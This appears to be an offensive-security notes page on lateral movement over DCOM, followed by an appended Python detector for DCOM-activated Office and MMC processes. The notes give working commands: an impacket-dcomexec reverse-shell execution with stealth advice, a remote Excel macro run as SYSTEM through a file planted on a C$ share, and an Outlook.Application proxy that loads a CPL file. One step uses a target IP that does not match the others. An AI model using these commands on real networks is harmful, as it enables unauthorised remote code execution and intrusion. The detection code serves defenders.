DCOM Lateral Movement

05.06.2024 · dadevel

Lateral Movement over DCOM.

Execute a reverse shell.

impacket-dcomexec -k -no-pass -nooutput srv01.corp.com "powershell.exe -ep bypass -e $(iconv -t utf16le ./shell.ps1 | base64 -w0)"

OpSec: By default the command output is written to a file on the target and fetched back over SMB, which leaves a file artifact and an extra SMB session. Passing -nooutput avoids this.

Untested tools:

  • DLHell, Python script for DCOM DLL proxying
  • CheeseDcom, implements many different methods in C#


Excel.Application

Check whether the target 192.168.12.13 exposes Excel.Application over DCOM and inspect the returned object.

$com = [activator]::CreateInstance([type]::GetTypeFromProgId('Excel.Application', '192.168.12.13'))
$com | Get-Member

Create a new Excel document, select View/Macros, name the macro mymacro and insert the following VBA payload.

Sub mymacro()
  shell("calc.exe")
End Sub

Then save the Excel sheet in the old *.xls format (macro-enabled).

Copy the document.

cp ./evil.xls \\192.168.12.13\c$\evil.xls

When Excel is started through DCOM it runs in the SYSTEM context and complains about folders missing from that account's profile directory. Create the missing folder on the target first.

mkdir \\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop

Run the macro.

$workbook = $com.Workbooks.Open('C:\evil.xls')
# Run() is a method of the Excel.Application object, not of the Workbook
$com.Run('mymacro')

Outlook.Application + CPL file

Remote access to some DCOM objects is blocked. Outlook.Application can be used as a proxy to bypass this restriction.

Load a CPL file via DCOM (the CLSID below is Outlook.Application).

$a = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("0006F033-0000-0000-C000-000000000046", "ws01.corp.com"))
$b = $a.CreateObject("Shell.Application")
$b.ControlPanelItem("%TEMP%\windefend.cpl")
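Added example, not part of the original notes and not from impacket or any tool named above: detection logic for the activity described in the dcomexec, Excel.Application and Outlook.Application sections. It walks process-creation events (field names and the sample events are constructed for this example) and flags Office or MMC processes that were activated by the DCOM launcher (parent svchost.exe running the DcomLaunch service, or an -Embedding activation flag on the command line) when they run as SYSTEM or spawn a shell or script host. The mapping of the page's COM classes to their host binaries (Excel.Application to excel.exe, Outlook.Application to outlook.exe, MMC20.Application to mmc.exe) is an assumption stated in the code.

```python
"""Flag DCOM-activated Office/MMC processes that look like lateral movement.

Events are modelled after Sysmon event 1 / Windows 4688 fields; the sample
data below is constructed for this example, not captured from a real host.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable file name, lower-case
    cmdline: str
    user: str


# Assumption of this example: host binaries of the COM classes used on the page.
DCOM_HOSTS = {"excel.exe", "outlook.exe", "mmc.exe"}

# Children that indicate the COM object was used to run code, not edit a document.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
          "cscript.exe", "rundll32.exe", "control.exe"}

SYSTEM_ACCOUNTS = {"NT AUTHORITY\\SYSTEM", "SYSTEM"}


def is_dcom_launcher(ev: ProcEvent) -> bool:
    """svchost.exe hosting the DCOM Server Process Launcher service."""
    return ev.image == "svchost.exe" and "dcomlaunch" in ev.cmdline.lower()


def dcom_activated(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> bool:
    """True when an Office/MMC host was started by COM activation."""
    if ev.image not in DCOM_HOSTS:
        return False
    parent: Optional[ProcEvent] = by_pid.get(ev.ppid)
    # COM-started servers carry -Embedding; DCOM-started ones hang off DcomLaunch.
    return "-embedding" in ev.cmdline.lower() or (
        parent is not None and is_dcom_launcher(parent))


def find_dcom_lateral_movement(events: List[ProcEvent]) -> List[dict]:
    """Return one finding per suspicious DCOM-activated host process."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if not dcom_activated(ev, by_pid):
            continue
        reasons = []
        # Excel launched over DCOM runs as SYSTEM (see the Excel section above).
        if ev.user.upper() in SYSTEM_ACCOUNTS:
            reasons.append("office-host-as-system")
        for child in events:
            if child.ppid == ev.pid and child.image in SHELLS:
                reasons.append(f"spawned {child.image} (pid {child.pid})")
        if reasons:
            findings.append({"pid": ev.pid, "image": ev.image,
                             "user": ev.user, "reasons": reasons})
    return findings


# Constructed sample: one DCOM-launched Excel as SYSTEM spawning PowerShell,
# one interactive Excel opened by a user (benign), one DCOM-launched MMC
# spawning cmd.exe (the dcomexec MMC20.Application pattern).
SAMPLE_EVENTS = [
    ProcEvent(700, 4, "svchost.exe",
              r"C:\Windows\system32\svchost.exe -k DcomLaunch -p",
              r"NT AUTHORITY\SYSTEM"),
    ProcEvent(4120, 700, "excel.exe",
              r'"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" /automation -Embedding',
              r"NT AUTHORITY\SYSTEM"),
    ProcEvent(4188, 4120, "powershell.exe",
              "powershell.exe -ep bypass -e <constructed-base64>",
              r"NT AUTHORITY\SYSTEM"),
    ProcEvent(5400, 900, "explorer.exe", r"C:\Windows\explorer.exe", r"CORP\alice"),
    ProcEvent(5500, 5400, "excel.exe",
              r'"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" C:\Users\alice\budget.xlsx',
              r"CORP\alice"),
    ProcEvent(6000, 700, "mmc.exe", r"C:\Windows\system32\mmc.exe -Embedding",
              r"CORP\svc-backup"),
    ProcEvent(6010, 6000, "cmd.exe", r"cmd.exe /Q /c hostname", r"CORP\svc-backup"),
]


if __name__ == "__main__":
    for finding in find_dcom_lateral_movement(SAMPLE_EVENTS):
        print(finding)
```

On the sample data the interactive Excel (pid 5500) produces no finding, while the DCOM-activated Excel (pid 4120, SYSTEM, child powershell.exe) and MMC (pid 6000, child cmd.exe) do. Correlating the host process start with a preceding network logon (event 4624, logon type 3) from the same source address is the natural next step, since DCOM activation from a remote machine always rides on such a logon.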
